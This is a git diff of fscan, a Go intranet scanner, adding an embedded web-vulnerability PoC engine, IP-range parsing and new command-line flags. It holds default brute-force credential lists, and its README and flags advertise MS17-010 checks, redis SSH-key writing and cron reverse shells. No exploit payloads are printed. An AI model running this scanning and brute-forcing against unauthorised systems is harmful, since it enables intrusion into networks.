func WebTitle(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) (err error, result string) {
info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
err, result = geturl(info)
if err == nil && info.IsWebCan == false {
WebScan.WebScan(info)
}
info.Url = fmt.Sprintf("https://%s:%s", info.Host, info.Ports)
err, result = geturl(info)
if err == nil && info.IsWebCan == false {
WebScan.WebScan(info)
}
wg.Done()
<-ch
return err, result
}
func geturl(info *common.HostInfo) (err error, result string) {
url := info.Url
var client = &http.Client{Timeout:time.Duration(info.Timeout)*time.Second }
res,err:=http.NewRequest("GET",url,nil)
if err==nil{
res.Header.Add("User-agent","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Add("Accept","*/*")
res.Header.Add("Accept-Language","zh-CN,zh;q=0.9")
res.Header.Add("Accept-Encoding","gzip, deflate")
res.Header.Add("Connection","close")
resp,err:=client.Do(res)
if err==nil{
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
var client = &http.Client{Timeout: time.Duration(info.WebTimeout) * time.Second, Transport: tr}
res, err := http.NewRequest("GET", url, nil)
if err == nil {
res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Add("Accept", "*/*")
res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
res.Header.Add("Accept-Encoding", "gzip, deflate")
res.Header.Add("Connection", "close")
resp, err := client.Do(res)
if err == nil {
defer resp.Body.Close()
var title string
body, _ := ioutil.ReadAll(resp.Body)
re :=regexp.MustCompile("<title>(.*)</title>")
find := re.FindAllStringSubmatch(string(body),-1)
if len(find) > 0{
re := regexp.MustCompile("<title>(.*)</title>")
find := re.FindAllStringSubmatch(string(body), -1)
if len(find) > 0 {
title = find[0][1]
}else {
} else {
title = "None"
}
if len(title) > 50{
if len(title) > 50 {
title = title[:50]
}
if resp.StatusCode == 400 && string(url[5]) != "https"{
info.Url = strings.Replace(url, "http://", "https://", 1)
return geturl(info)
}else {
result = fmt.Sprintf("WebTitle:%v %v %v",url,resp.StatusCode,title)
common.LogSuccess(result)
}
result = fmt.Sprintf("WebTitle:%v %v %v", url, resp.StatusCode, title)
common.LogSuccess(result)
return err, result
}
return err, ""
}
return err, ""
//fmt.Print("\n")
}
//var client = &http.Client{
// Transport:&http.Transport{
// DialContext:(&net.Dialer{
// Timeout:time.Duration(info.Timeout)*time.Second,
// }).DialContext,
// },
// CheckRedirect:func(req *http.Request, via []*http.Request) error{
// return http.ErrUseLastResponse
// },
//}
//if info.Cookie!=""{
// res.Header.Add("Cookie",info.Cookie)
//}
//if info.Header!=""{
// var header = make(map[string]string)
// err:=json.Unmarshal([]byte(info.Header),&header)
// if err!=nil{
// Misc.CheckErr(err)
// }
// for k,v:=range header{
// res.Header.Add(k,v)
// }
//}

42
README.md
View File

@@ -1,8 +1,8 @@
# fscan
# 简介
一款内网扫描工具,方便一键大保健。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等。
一款内网扫描工具,方便一键大保健。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息、web漏洞扫描等。
趁着最近有空用go把f-scrack重构了一遍。使用go来编写也有更好的扩展性及兼容性。
还在逐步增加功能,欢迎各位师傅提意见。
@@ -13,6 +13,14 @@
答:
因为用习惯了f-scrack习惯一条命令跑完所有模块省去一个个模块单独调用的时间当然我附加了-m 指定模块的功能。
## 最近更新
[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试
[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)
[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。
[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。
[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。
[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段
[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理
## usege
简单用法
@@ -35,22 +43,36 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
完整参数
```
-Num int
poc rate (default 20)
-c string
exec command (ssh)
-domain string
smb domain
-h string
IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
host file, -hs ip.txt
-it int
Icmp Threads nums (default 11000)
-m string
Select scan type ,as: -m ssh (default "all")
-no
not to save output log
-nopoc
not to scan web vul
-np
not to ping
-o string
Outputfile (default "result.txt")
-p string
Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,23,80,135,443,445,1433,1521,3306,5432,6379,7001,8080,8089,9000,9200,11211,27017")
Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,11211,27017")
-ping
using ping replace icmp
-pocname string
use the pocs these contain pocname, -pocname weblogic
-proxy string
set poc proxy, -proxy http://127.0.0.1:8080
-pwd string
password
-pwdf string
@@ -60,13 +82,15 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
-rs string
redis shell to write cron file (as: -rs 192.168.1.1:6666)
-t int
Thread nums (default 100)
Thread nums (default 200)
-time int
Set timeout (default 3)
-user string
username
-userf string
username file
-wt int
Set web timeout (default 3)
```
@@ -83,12 +107,11 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
![](image/3.png)
## 最近更新
2020/11/15
[+] 支持ip以文件导入,-hs ip.txt
`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc`
![](image/2020-12-12-13-34-44.png)
## 未来计划
[*] 合理输出当前扫描进度
[*] 增加内网常见高危漏洞
[*] 增加高危web漏洞扫描
[*] 师傅们觉得有必要加的漏洞也可以提issue
@@ -98,4 +121,5 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc

42
WebScan/WebScan.go Normal file
View File

@@ -0,0 +1,42 @@
package WebScan
import (
"embed"
"github.com/shadow1ng/fscan/WebScan/lib"
"github.com/shadow1ng/fscan/common"
"net/http"
"time"
)
//go:embed pocs
var Pocs embed.FS
func WebScan(info *common.HostInfo) {
info.PocInfo.Target = info.Url
Execute(info.PocInfo)
}
func Execute(PocInfo common.PocInfo) error {
//PocInfo.Proxy = "http://127.0.0.1:8080"
err := lib.InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
if err != nil {
return err
}
req, err := http.NewRequest("GET", PocInfo.Target, nil)
req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
if err != nil {
return err
}
if PocInfo.Cookie != "" {
req.Header.Set("Cookie", PocInfo.Cookie)
}
//PocInfo.PocName = "weblogic-cve-2017-10271.yml"
if PocInfo.PocName != "" {
lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
} else {
lib.CheckMultiPoc(req, Pocs, PocInfo.Num, "")
}
return nil
}

244
common/ParseIP.go
View File

@@ -11,162 +11,190 @@ import (
"strings"
)
var ParseIPErr =errors.New("host parsing error\n" +
"format: \n"+
var ParseIPErr = errors.New(" host parsing error\n" +
"format: \n" +
"192.168.1.1\n" +
"192.168.1.1/8\n"+
"192.168.1.1/16\n"+
"192.168.1.1/24\n"+
"192.168.1.1/8\n" +
"192.168.1.1/16\n" +
"192.168.1.1/24\n" +
"192.168.1.1,192.168.1.2\n" +
"192.168.1.1-192.168.255.255\n" +
"192.168.1.1-255")
func ParseIP(ip string,filename string)(hosts []string,err error){
func ParseIP(ip string, filename string) (hosts []string, err error) {
if ip != ""{
hosts,err = ParseIPs(ip)
if ip != "" {
hosts, err = ParseIPs(ip)
}
if filename != ""{
if filename != "" {
var filehost []string
filehost,_ = Readipfile(filename)
hosts = append(hosts,filehost...)
filehost, _ = Readipfile(filename)
hosts = append(hosts, filehost...)
}
hosts = RemoveDuplicate(hosts)
return hosts,err
return hosts, err
}
func ParseIPs(ip string)(hosts []string,err error){
if strings.Contains(ip,","){
IPList:=strings.Split(ip,",")
func ParseIPs(ip string) (hosts []string, err error) {
if strings.Contains(ip, ",") {
IPList := strings.Split(ip, ",")
var ips []string
for _,ip:=range IPList{
ips,err = ParseIPone(ip)
CheckErr(ip,err)
hosts = append(hosts,ips...)
for _, ip := range IPList {
ips, err = ParseIPone(ip)
CheckErr(ip, err)
hosts = append(hosts, ips...)
}
return hosts,err
}else {
hosts,err = ParseIPone(ip)
CheckErr(ip,err)
return hosts,err
return hosts, err
} else {
hosts, err = ParseIPone(ip)
CheckErr(ip, err)
return hosts, err
}
}
func ParseIPone(ip string)([]string,error){
reg:=regexp.MustCompile(`[a-zA-Z]+`)
func ParseIPone(ip string) ([]string, error) {
reg := regexp.MustCompile(`[a-zA-Z]+`)
switch {
case strings.Contains(ip[len(ip)-3:len(ip)],"/24"):
case strings.Contains(ip[len(ip)-3:len(ip)], "/24"):
return ParseIPA(ip)
case strings.Contains(ip[len(ip)-3:len(ip)],"/16"):
case strings.Contains(ip[len(ip)-3:len(ip)], "/16"):
return ParseIPD(ip)
case strings.Contains(ip[len(ip)-2:len(ip)],"/8"):
case strings.Contains(ip[len(ip)-2:len(ip)], "/8"):
return ParseIPE(ip)
case strings.Count(ip,"-")==1:
case strings.Count(ip, "-") == 1:
return ParseIPC(ip)
case reg.MatchString(ip):
_, err := net.LookupHost(ip)
if err != nil {
return nil,err
return nil, err
}
return []string{ip},nil
return []string{ip}, nil
default:
testIP:=net.ParseIP(ip)
if testIP==nil{
return nil,ParseIPErr
testIP := net.ParseIP(ip)
if testIP == nil {
return nil, ParseIPErr
}
return []string{ip},nil
return []string{ip}, nil
}
}
//Parsing CIDR IP
func ParseIPA(ip string)([]string,error){
realIP:=ip[:len(ip)-3]
testIP:=net.ParseIP(realIP)
if testIP==nil{
return nil,ParseIPErr
//Parsing CIDR IP
func ParseIPA(ip string) ([]string, error) {
realIP := ip[:len(ip)-3]
testIP := net.ParseIP(realIP)
if testIP == nil {
return nil, ParseIPErr
}
IPrange:=strings.Join(strings.Split(realIP,".")[0:3],".")
IPrange := strings.Join(strings.Split(realIP, ".")[0:3], ".")
var AllIP []string
for i:=0;i<=255;i++{
AllIP=append(AllIP,IPrange+"."+strconv.Itoa(i))
for i := 0; i <= 255; i++ {
AllIP = append(AllIP, IPrange+"."+strconv.Itoa(i))
}
return AllIP,nil
return AllIP, nil
}
//Resolving multiple IPS, for example: 192.168.111.1,192.168.111.2
func ParseIPB(ip string)([]string,error){
IPList:=strings.Split(ip,",")
for _,i:=range IPList{
testIP:=net.ParseIP(i)
if testIP==nil{
return nil,ParseIPErr
func ParseIPB(ip string) ([]string, error) {
IPList := strings.Split(ip, ",")
for _, i := range IPList {
testIP := net.ParseIP(i)
if testIP == nil {
return nil, ParseIPErr
}
}
return IPList,nil
return IPList, nil
}
//Resolving a range of IP,for example: 192.168.111.1-255
func ParseIPC(ip string)([]string,error){
IPRange:=strings.Split(ip,"-")
testIP:=net.ParseIP(IPRange[0])
Range,err:=strconv.Atoi(IPRange[1])
if testIP==nil || Range>255 || err!=nil{
return nil,ParseIPErr
}
SplitIP:=strings.Split(IPRange[0],".")
ip1,err1:=strconv.Atoi(SplitIP[3])
ip2,err2:=strconv.Atoi(IPRange[1])
PrefixIP:=strings.Join(SplitIP[0:3],".")
//Resolving a range of IP,for example: 192.168.111.1-255,192.168.111.1-192.168.112.255
func ParseIPC(ip string) ([]string, error) {
IPRange := strings.Split(ip, "-")
testIP := net.ParseIP(IPRange[0])
var AllIP []string
if ip1>ip2 || err1!=nil || err2!=nil{
return nil,ParseIPErr
}
for i:=ip1;i<=ip2;i++{
AllIP=append(AllIP,PrefixIP+"."+strconv.Itoa(i))
}
return AllIP,nil
}
func ParseIPD(ip string)([]string,error){
realIP:=ip[:len(ip)-3]
testIP:=net.ParseIP(realIP)
if testIP==nil{
return nil,ParseIPErr
}
IPrange:=strings.Join(strings.Split(realIP,".")[0:2],".")
var AllIP []string
for a:=0;a<=255;a++{
for b:=0;b<=255;b++{
AllIP=append(AllIP,IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b))
if len(IPRange[1]) < 4 {
Range, err := strconv.Atoi(IPRange[1])
if testIP == nil || Range > 255 || err != nil {
return nil, ParseIPErr
}
SplitIP := strings.Split(IPRange[0], ".")
ip1, err1 := strconv.Atoi(SplitIP[3])
ip2, err2 := strconv.Atoi(IPRange[1])
PrefixIP := strings.Join(SplitIP[0:3], ".")
if ip1 > ip2 || err1 != nil || err2 != nil {
return nil, ParseIPErr
}
for i := ip1; i <= ip2; i++ {
AllIP = append(AllIP, PrefixIP+"."+strconv.Itoa(i))
}
} else {
SplitIP1 := strings.Split(IPRange[0], ".")
SplitIP2 := strings.Split(IPRange[1], ".")
fmt.Println(SplitIP1, SplitIP2, len(SplitIP1), len(SplitIP2))
if len(SplitIP1) != 4 || len(SplitIP2) != 4 {
return nil, ParseIPErr
}
start, end := [4]int{}, [4]int{}
for i := 0; i < 4; i++ {
ip1, err1 := strconv.Atoi(SplitIP1[i])
ip2, err2 := strconv.Atoi(SplitIP2[i])
if ip1 > ip2 || err1 != nil || err2 != nil {
return nil, ParseIPErr
}
start[i], end[i] = ip1, ip2
}
startNum := (start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3])
endNum := (end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3])
fmt.Println(startNum, endNum)
for num := startNum; num < endNum; num++ {
ip := (strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff))
AllIP = append(AllIP, ip)
}
}
return AllIP,nil
return AllIP, nil
}
func ParseIPE(ip string)([]string,error){
realIP:=ip[:len(ip)-2]
testIP:=net.ParseIP(realIP)
func ParseIPD(ip string) ([]string, error) {
realIP := ip[:len(ip)-3]
testIP := net.ParseIP(realIP)
if testIP==nil{
return nil,ParseIPErr
if testIP == nil {
return nil, ParseIPErr
}
IPrange:=strings.Join(strings.Split(realIP,".")[0:1],".")
IPrange := strings.Join(strings.Split(realIP, ".")[0:2], ".")
var AllIP []string
for a:=0;a<=255;a++{
for b:=0;b<=255;b++{
AllIP=append(AllIP,IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b)+"."+strconv.Itoa(1))
AllIP=append(AllIP,IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b)+"."+strconv.Itoa(254))
for a := 0; a <= 255; a++ {
for b := 0; b <= 255; b++ {
AllIP = append(AllIP, IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b))
}
}
return AllIP,nil
return AllIP, nil
}
func Readipfile(filename string)([]string,error){
func ParseIPE(ip string) ([]string, error) {
realIP := ip[:len(ip)-2]
testIP := net.ParseIP(realIP)
if testIP == nil {
return nil, ParseIPErr
}
IPrange := strings.Join(strings.Split(realIP, ".")[0:1], ".")
var AllIP []string
for a := 0; a <= 255; a++ {
for b := 0; b <= 255; b++ {
AllIP = append(AllIP, IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b)+"."+strconv.Itoa(1))
AllIP = append(AllIP, IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b)+"."+strconv.Itoa(254))
}
}
return AllIP, nil
}
func Readipfile(filename string) ([]string, error) {
file, err := os.Open(filename)
if err!=nil{
fmt.Println("Open %s error, %v", filename,err)
if err != nil {
fmt.Println("Open %s error, %v", filename, err)
os.Exit(0)
}
defer file.Close()
@@ -176,16 +204,15 @@ func Readipfile(filename string)([]string,error){
for scanner.Scan() {
text := strings.TrimSpace(scanner.Text())
if text != "" {
host,err := ParseIPs(text)
CheckErr(text,err)
content=append(content,host...)
host, err := ParseIPs(text)
CheckErr(text, err)
content = append(content, host...)
}
}
return content,nil
return content, nil
}
func RemoveDuplicate(old []string) ([]string) {
func RemoveDuplicate(old []string) []string {
result := make([]string, 0, len(old))
temp := map[string]struct{}{}
for _, item := range old {
@@ -196,4 +223,3 @@ func RemoveDuplicate(old []string) ([]string) {
}
return result
}

174
common/config.go
View File

@@ -1,108 +1,100 @@
package common
//fscan version 1.3
var Userdict = map[string][]string{
"ftp": {"www","admin","root","db","wwwroot","data","web","ftp"},
"mysql": {"root"},
"mssql": {"root","sa"},
"smb": {"administrator","guest"},
"postgresql": {"postgres","admin"},
"ssh": {"root","admin"},
"mongodb": {"root","admin"},
"ftp": {"www", "admin", "root", "db", "wwwroot", "data", "web", "ftp"},
"mysql": {"root"},
"mssql": {"root", "sa"},
"smb": {"administrator", "guest"},
"postgresql": {"postgres", "admin"},
"ssh": {"root", "admin"},
"mongodb": {"root", "admin"},
//"telnet": []string{"administrator","admin","root","cisco","huawei","zte"},
}
var Passwords = []string{"admin123A","admin123","123456","admin","root","password","123123","654321","123","1","admin@123","Admin@123","{user}","{user}123","","P@ssw0rd!","qwa123","12345678","test","123qwe!@#","123456789","123321","666666","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1qaz@WSX","Aa123456","sysadmin","system","huawei"}
var Passwords = []string{"admin123A", "admin123", "123456", "admin", "root", "password", "123123", "654321", "123", "1", "admin@123", "Admin@123", "{user}", "{user}123", "", "P@ssw0rd!", "qwa123", "12345678", "test", "123qwe!@#", "123456789", "123321", "666666", "fuckyou", "000000", "1234567890", "8888888", "qwerty", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "Aa123456", "sysadmin", "system", "huawei"}
var PORTList = map[string]int{
"ftp": 21,
"ssh": 22,
"mem": 11211,
"mgo": 27017,
"mssql": 1433,
"psql": 5432,
"redis": 6379,
"mysql": 3306,
"smb": 445,
"ms17010": 1000001,
"cve20200796":1000002,
"elastic": 9200,
"findnet": 135,
"all":0,
//"wenscan": 17010,
"ftp": 21,
"ssh": 22,
"mem": 11211,
"mgo": 27017,
"mssql": 1433,
"psql": 5432,
"redis": 6379,
"mysql": 3306,
"smb": 445,
"ms17010": 1000001,
"cve20200796": 1000002,
"webtitle": 1000003,
"elastic": 9200,
"findnet": 135,
"all": 0,
}
var PORTList_bak = map[string]int{
"ftp": 21,
"ssh": 22,
"mem": 11211,
"mgo": 27017,
"mssql": 1433,
"psql": 5432,
"redis": 6379,
"mysql": 3306,
"smb": 445,
"ms17010": 1000001,
"cve20200796": 1000002,
"webtitle": 1000003,
"elastic": 9200,
"findnet": 135,
"all": 0,
}
var Outputfile = "result.txt"
var IsSave = true
var DefaultPorts = "21,22,23,80,135,443,445,1433,1521,3306,5432,6379,7001,8080,8089,9000,9200,11211,27017"
var DefaultPorts = "21,22,80,81,135,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,11211,27017"
type HostInfo struct {
Host string
HostFile string
Ports string
Url string
Timeout int64
Scantype string
Isping bool
Threads int
Command string
Username string
Password string
Userfile string
Passfile string
Usernames []string
Passwords []string
Outputfile string
IsSave bool
RedisFile string
RedisShell string
Host string
HostFile string
Ports string
Domain string
Url string
Timeout int64
WebTimeout int64
Scantype string
Ping bool
Isping bool
Threads int
IcmpThreads int
Command string
Username string
Password string
Userfile string
Passfile string
Usernames []string
Passwords []string
Outputfile string
IsSave bool
RedisFile string
RedisShell string
IsWebCan bool
PocInfo PocInfo
}
//var Passwords = []string{"admin123A","123456","admin","root","password","123123","123","1","{user}","{user}{user}","{user}1","{user}123","{user}2016","{user}2015","{user}!","","P@ssw0rd!!","qwa123","12345678","test","123qwe!@#","123456789","123321","1314520","666666","woaini","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1q2w3e4r","123qwe","p@ssw0rd","p@55w0rd","password!","p@ssw0rd!","password1","r00t","tomcat","apache","system","huawei","admin123","zte"}
//const Username = "admin"
//const Password = "123456"
//const Timeout = 3 * time.Second
//const FTPPORT = 21
//const SSHPORT = 22
//const MEMCACHEDPORT = 11211
//const MONGODBPORT = 27017
//const MSSQLPORT = 1433
//const OraclePORT = 1433
//const PSQLPORT = 5432
//const REDISPORT = 6379
//const MYSQLPORT = 3306
//const SMBPORT = 445
//const POSTGRESPORT = 5432
//var Userdict = map[string][]string{
// "ftp": []string{"www","admin","root","db","wwwroot","data","web","ftp"},
// "mysql": []string{"root"},
// "mssql": []string{"root","sa"},
// "smb": []string{"administrator","guest"},
// "postgresql": []string{"postgres","admin"},
// "ssh": []string{"root","admin"},
// "mongodb": []string{"root","admin"},
// //"telnet": []string{"administrator","admin","root","cisco","huawei","zte"},
//}
//var PluginList = map[string]interface{}{
// "ftp": FtpScan,
// "mysql": MysqlScan,
// //"mongodb":MgoConn,
// "mssql":MssqlScan,
// "redis": RedisScan,
// //"smb": SmbScan,
// "ssh": SshScan,
// //"portscan": PortConn,
// //"icmp": IcmpConn,
// "postgresql": PostgresScan,
// //"urlscan":UrlConn,
// //"auth":ApacheConn,
// //"subdomain":SDConn,
// //"memcached":MemConn,
//}
type PocInfo struct {
Num int
Rate int
Timeout int64
Proxy string
PocName string
PocDir string
Target string
TargetFile string
RawFile string
Cookie string
ForceSSL bool
ApiKey string
CeyeDomain string
}

52
common/flag.go
View File

@@ -4,38 +4,44 @@ import (
"flag"
)
func Banner(){
func Banner() {
banner := `
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _`+"`"+` |/ __| |/ /
/ /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
`
print(banner)
}
func Flag(Info *HostInfo) {
func Flag(Info *HostInfo) {
Banner()
flag.StringVar(&Info.Host,"h","","IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12")
flag.StringVar(&Info.HostFile,"hf","","host file, -hs ip.txt")
flag.StringVar(&Info.Ports,"p",DefaultPorts,"Select a port,for example: 22 | 1-65535 | 22,80,3306")
flag.StringVar(&Info.Command,"c","","exec command (ssh)")
flag.IntVar(&Info.Threads,"t",100,"Thread nums")
flag.BoolVar(&Info.Isping,"np",false,"not to ping")
flag.BoolVar(&Info.IsSave,"no",false,"not to save output log")
flag.StringVar(&Info.Username,"user","","username")
flag.StringVar(&Info.Userfile,"userf","","username file")
flag.StringVar(&Info.Password,"pwd","","password")
flag.StringVar(&Info.Passfile,"pwdf","","password file")
flag.StringVar(&Info.Outputfile,"o","result.txt","Outputfile")
flag.Int64Var(&Info.Timeout,"time",3,"Set timeout")
flag.StringVar(&Info.Scantype,"m","all","Select scan type ,as: -m ssh")
flag.StringVar(&Info.RedisFile,"rf","","redis file to write sshkey file (as: -rf id_rsa.pub) ")
flag.StringVar(&Info.RedisFile,"rs","","redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
flag.StringVar(&Info.Host, "h", "", "IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12")
flag.StringVar(&Info.HostFile, "hf", "", "host file, -hs ip.txt")
flag.StringVar(&Info.Ports, "p", DefaultPorts, "Select a port,for example: 22 | 1-65535 | 22,80,3306")
flag.StringVar(&Info.Command, "c", "", "exec command (ssh)")
flag.IntVar(&Info.Threads, "t", 200, "Thread nums")
flag.IntVar(&Info.IcmpThreads, "it", 11000, "Icmp Threads nums")
flag.BoolVar(&Info.Isping, "np", false, "not to ping")
flag.BoolVar(&Info.Ping, "ping", false, "using ping replace icmp")
flag.BoolVar(&Info.IsSave, "no", false, "not to save output log")
flag.StringVar(&Info.Domain, "domain", "", "smb domain")
flag.StringVar(&Info.Username, "user", "", "username")
flag.StringVar(&Info.Userfile, "userf", "", "username file")
flag.StringVar(&Info.Password, "pwd", "", "password")
flag.StringVar(&Info.Passfile, "pwdf", "", "password file")
flag.StringVar(&Info.Outputfile, "o", "result.txt", "Outputfile")
flag.Int64Var(&Info.Timeout, "time", 3, "Set timeout")
flag.Int64Var(&Info.WebTimeout, "wt", 3, "Set web timeout")
flag.StringVar(&Info.Scantype, "m", "all", "Select scan type ,as: -m ssh")
flag.StringVar(&Info.RedisFile, "rf", "", "redis file to write sshkey file (as: -rf id_rsa.pub) ")
flag.StringVar(&Info.RedisShell, "rs", "", "redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
flag.BoolVar(&Info.IsWebCan, "nopoc", false, "not to scan web vul")
flag.StringVar(&Info.PocInfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic")
flag.StringVar(&Info.PocInfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
flag.IntVar(&Info.PocInfo.Num, "Num", 20, "poc rate")
flag.Parse()
}
}

2
common/log.go
View File

@@ -17,7 +17,7 @@ func LogSuccess(result string){
}
func WriteFile(result string,filename string) {
var text = []byte(result+"\n")
fl, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE, 0777)
fl, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0777)
if err != nil {
fmt.Println(err)
return

20
go.mod Normal file
View File

@@ -0,0 +1,20 @@
module github.com/shadow1ng/fscan
go 1.15
require (
github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f // indirect
github.com/denisenkom/go-mssqldb v0.9.0
github.com/go-sql-driver/mysql v1.5.0
github.com/golang/protobuf v1.4.1
github.com/google/cel-go v0.4.2
github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126
github.com/lib/pq v1.8.0
github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582
golang.org/x/net v0.0.0-20200505041828-1ed23360d12c // indirect
golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3 // indirect
google.golang.org/genproto v0.0.0-20200430143042-b979b6f78d84
google.golang.org/grpc v1.29.1 // indirect
gopkg.in/yaml.v3 v3.0.0-20200615113413-eeeca48fe776
)

120
go.sum Normal file
View File

@@ -0,0 +1,120 @@
cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
github.com/antlr/antlr4 v0.0.0-20190819145818-b43a4c3a8015/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y=
github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f h1:0cEys61Sr2hUBEXfNV8eyQP01oZuBgoMeHunebPirK8=
github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y=
github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU=
github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw=
github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc=
github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/denisenkom/go-mssqldb v0.9.0 h1:RSohk2RsiZqLZ0zCjtfn3S4Gp4exhpBWHyQ7D0yGjAk=
github.com/denisenkom/go-mssqldb v0.9.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU=
github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98=
github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c=
github.com/go-sql-driver/mysql v1.5.0 h1:ozyZYNQW3x3HtqT1jira07DN2PArx2v7/mN66gGcHOs=
github.com/go-sql-driver/mysql v1.5.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg=
github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY=
